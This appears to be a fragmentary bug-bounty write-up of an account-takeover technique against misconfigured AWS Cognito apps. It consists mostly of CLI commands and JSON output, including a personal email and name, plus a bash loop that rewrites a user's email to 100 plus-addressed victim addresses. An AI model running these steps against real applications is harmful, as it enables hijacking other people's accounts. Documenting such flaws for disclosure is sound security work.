ATO without any interaction [aws cognito misconfiguration]

About AWS Cognito:

AWS Cognito flow
$ aws cognito-idp get-user --region us-west-2 --access-token <token>
{
    "Username": "3b84472e-5b44-4d9e-bbea-a49592b8e162",
    "UserAttributes": [
        {
            "Name": "sub",
            "Value": "3b84472e-5b44-4d9e-bbea-a49592b8e162"
        },
        {
            "Name": "email_verified",
            "Value": "true"
        },
        {
            "Name": "email",
            "Value": "shreyaskoli165@gmail.com"
        }
    ]
}

$ aws cognito-idp get-user --region us-west-2 --access-token <token>
{
    "Username": "google_107427578229077464095",
    "UserAttributes": [
        {
            "Name": "sub",
            "Value": "0080f3d4-2173-469f-a929-8a67225d446c"
        },
        {
            "Name": "identities",
            "Value": "[{\"userId\":\"107427578229077464095\",\"providerName\":\"Google\",\"providerType\":\"Google\",\"issuer\":null,\"primary\":true,\"dateCreated\":1651166579396}]"
        },
        {
            "Name": "email_verified",
            "Value": "true"
        },
        {
            "Name": "given_name",
            "Value": "Shreyas"
        },
        {
            "Name": "family_name",
            "Value": "Koli"
        },
        {
            "Name": "email",
            "Value": "shreyaskoli165@gmail.com"
        }
    ]
}

$ aws cognito-idp update-user-attributes --region us-west-2 --user-attributes 'Name=email,Value=victimsemail@gmail.com' --access-token [access token]
{
    "CodeDeliveryDetailsList": [
        {
            "Destination": "v***@g***",
            "DeliveryMedium": "EMAIL",
            "AttributeName": "email"
        }
    ]
}

Error popup
get-user request
$ aws cognito-idp update-user-attributes --region us-west-2 --user-attributes 'Name=email,Value=victimsemail@gmail.com' --access-token [access token]

#!/bin/bash
# Send 100 update-user-attributes requests, each with a different plus-addressed email value
for i in {1..100}
do
    echo "$i]"
    aws cognito-idp update-user-attributes --region us-west-2 --user-attributes "Name=email,Value=victimemail+$i@gmail.com" --access-token [token here]
done
